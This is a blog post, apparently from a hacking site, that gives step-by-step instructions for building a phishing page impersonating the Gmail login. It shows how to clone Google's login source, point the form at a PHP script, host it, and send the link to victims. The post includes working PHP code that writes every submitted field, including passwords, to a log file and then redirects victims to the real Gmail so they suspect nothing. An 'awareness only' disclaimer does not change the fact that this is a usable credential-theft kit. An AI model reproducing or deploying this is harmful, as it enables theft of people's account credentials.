How to make phishing pages for gmail,orkut,facebook [ Basics Included] [UPDATED]

1

I don’t know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for various sites like gmail or orkut.For making Phishing page for any site you need 3 types of files in common.They are

1) .Html file ( ie fake page )
2) .php file or any other action script page ( for tracking the details that entered in page created by you )
3) .Txt file ( To save all the details in text format )
In common,every phishing page contains these 3 files,But normally you can see only the fake page which looks exactly as original,remaining files will run in background that will not be visible for you.Here I am going to create a phishing page for gmail login.Procedures for creating phishing pages for all sites are same.I am giving you detailed instructions for making this page,Just follow my steps exactly as i mentioned.
STEPS FOR CREATING PHISHING PAGE.
1 ) First goto Gmail login page ( http://www.gmail.com,make sure that the page is loaded completely ) and right click and select view source ( in firefox ) or view source code option in other browsers.
2 ) Select all ( CTR + A ) and copy all the code and paste it in notepad.
3 ) Then search for the keyword action.You can see the code as given below.

action=”https://www.google.com/accounts/ServiceLoginAuth” method=”post”;
4 ) Just change the above code as mentioned below
action=”mail.php” method=”post”;
after changing to mail.php ( or anyname.php ) just save it in the form login.html ( anyname.html ). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5 ) For creating a php script,just copy the below php code into notepad and save in the format mail.php ( name mentioned in action of our phishing page )
<?php
header (‘Location: http://www.gmail.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

6 ) By this step our PHP script is also ready,Now create a .Txt file with name log.txt ( name mentioned in php script )

7 ) Now host these 3 files ie,
login.html

mail.php

log.txt

in any of free hosting servers like ripway,drivehq,100 mb etc (or any other,just google free hosting ).Make sure that these 3 files are in same directory.
8 ) After hosting you will get a direct link to your phishing page,that is to your login.html page.just use this link to access or send phishing page.
HOW PHISHING IS WORKING

When you enter your username and password in gnail login phishing page and click singin or hit enter the mail.php script is loaded and this will copy all the entered details in to your log.txt file.Since we are given http://www.gmail.com as the header location original gmail page will be loaded after the php script.So the victim will think that they entered wrong information.If victim is already logged in gmail,then their mail will be loaded.

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.mikehacks.wordpress.com will not be responsible for any such phishing attacks,KNOW HACKING BUT NO HACKING….

If you found anything useful in this article please pass your comments,All your feedbacks are precious……………

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s